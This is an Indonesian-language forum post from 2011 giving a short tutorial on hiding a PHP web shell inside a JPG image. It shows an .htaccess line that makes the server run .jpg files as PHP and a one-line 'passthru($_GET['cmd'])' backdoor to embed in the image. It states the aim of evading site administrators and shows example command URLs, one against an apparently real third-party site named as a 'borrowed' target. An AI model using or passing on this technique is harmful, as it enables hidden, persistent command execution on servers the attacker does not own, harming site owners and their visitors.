[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
BIkin shell dengan Htaccess
satriaDate: Friday, 2011-08-05, 8:51 AM | Message # 1
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline
Ane Share nih untuk om2 semua . dan maaf hanya sedikit om..
ayo kita tingkatkan share kita di forum ini om ...

BIkin shell dengan Htaccess
...
Banyak orang yang beranggapan bahwa backdoor (BD) yang disembunyikan pada web server sebuah website sudah di rasa aman dan tidak mungkin diketahui oleh admin maupun orang lain. Tetapi pada kenyataannya semua shell yang berekstensi .php pada sebuah web server dapat begituh mudah diketahui oleh sang Admin dan akan langsung di delete. Namun tidak demikian hal nya jika kita menyembunyikan shell kita dengan ekstensi .jpg atau .jpeg.

OK langsung saja,....

tambahkan kode berikut pada file .htaccess jika filenya tidak ada maka buatlah tongue

AddType application/x-httpd-php .jpg

lalu ambil sebuah gambar yang ber-ekstensi .jpeg atau .jpg lalu masukkan kode berikut pada gambar tadi

passthru($_GET['cmd']); ?>dan upload satu direktori dengan file .htaccess

sekarang coba bukalah URL tempat file image tadi berada,

contoh :

http://example.com/images/logo​.jpg?cmd=net+user

sebagai contoh lain saya mengambil target yang saya pinjamkan

http://www.harvesthowl.org/tes​t.jpg?cmd=dir
 
  • Page 1 of 1
  • 1
Search: